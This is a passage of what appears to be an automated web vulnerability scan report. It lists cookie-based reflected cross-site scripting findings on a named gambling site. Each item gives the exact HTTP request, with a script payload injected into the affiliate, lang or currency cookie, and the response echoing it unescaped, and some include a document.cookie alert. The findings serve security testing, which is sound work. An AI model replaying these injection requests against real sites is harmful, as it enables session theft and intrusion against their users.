Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a5e9"><script>alert(1)</script>657c0e10aea;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: currency=GBP3a5e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E657c0e10aea; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a5e9"><script>alert(1)</script>657c0e10aea', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.177. http://scratch.co.uk/over-18/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/over-18/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f0a"><script>alert(1)</script>260d517347e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGb2f0a"><script>alert(1)</script>260d517347e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENGb2f0a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E260d517347e; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGb2f0a"><script>alert(1)</script>260d517347e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/problem-gambling/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 394d5"><script>alert(1)</script>18bf32caf70 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243394d5"><script>alert(1)</script>18bf32caf70; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243394d5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18bf32caf70; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243394d5"><script>alert(1)</script>18bf32caf70');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/problem-gambling/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cdc"><script>alert(1)</script>71a5e08c364 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP46cdc"><script>alert(1)</script>71a5e08c364;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: currency=GBP46cdc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E71a5e08c364; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP46cdc"><script>alert(1)</script>71a5e08c364', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/problem-gambling/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c926"><script>alert(1)</script>9dd75eb04f8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG6c926"><script>alert(1)</script>9dd75eb04f8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: lang=ENG6c926%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dd75eb04f8; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG6c926"><script>alert(1)</script>9dd75eb04f8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.181. http://scratch.co.uk/promotions/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0e9"><script>alert(1)</script>086149d4525 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9"><script>alert(1)</script>086149d4525; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E086149d4525; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2433a0e9"><script>alert(1)</script>086149d4525');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.182. http://scratch.co.uk/promotions/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24c5"><script>alert(1)</script>25cd645fca was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPb24c5"><script>alert(1)</script>25cd645fca;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: currency=GBPb24c5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E25cd645fca; expires=Wed, 15-Jun-2011 12:29:41 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:41 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPb24c5"><script>alert(1)</script>25cd645fca', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.183. http://scratch.co.uk/promotions/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efd1"><script>alert(1)</script>3c552cf62ce was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG1efd1"><script>alert(1)</script>3c552cf62ce; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: lang=ENG1efd1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3c552cf62ce; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:54 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG1efd1"><script>alert(1)</script>3c552cf62ce', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/argos/

Issue detail

The value of the affiliate cookie is copied into the name of an HTML tag attribute. The payload 4c8ee><script>alert(1)</script>3e5e2c01180 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C2434c8ee><script>alert(1)</script>3e5e2c01180; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v7qe830mrf84u47aa649e3l553; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434c8ee%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e5e2c01180; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:42 GMT; path=/
Content-Type: text/html
Content-Length: 11164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445', 'ENG', 'direct-173|193|214|2434c8ee><script>alert(1)</script>3e5e2c01180');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.185. http://scratch.co.uk/promotions/argos/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/argos/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e5"><script>alert(1)</script>634156e0232 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=934e5"><script>alert(1)</script>634156e0232; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f6g2ell6noo67hb2etoak5a2j6; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: currency=934e5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E634156e0232; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:45 GMT; path=/
Content-Type: text/html
Content-Length: 11246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('934e5"><script>alert(1)</script>634156e0232', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.186. http://scratch.co.uk/promotions/argos/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/argos/

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload b3cbb><script>alert(1)</script>3e0744b42e1 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445b3cbb><script>alert(1)</script>3e0744b42e1; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hvmdk8ph4m8169sgi7bigmled5; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445b3cbb%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e0744b42e1; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:44 GMT; path=/
Content-Type: text/html
Content-Length: 11164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445b3cbb><script>alert(1)</script>3e0744b42e1', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.187. http://scratch.co.uk/promotions/argos/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/promotions/argos/

Issue detail

The value of the lang cookie is copied into the name of an HTML tag attribute. The payload 6154e><script>alert(1)</script>de94baa06bd was submitted in the lang cookie. This input was echoed unmodified in the application's response.
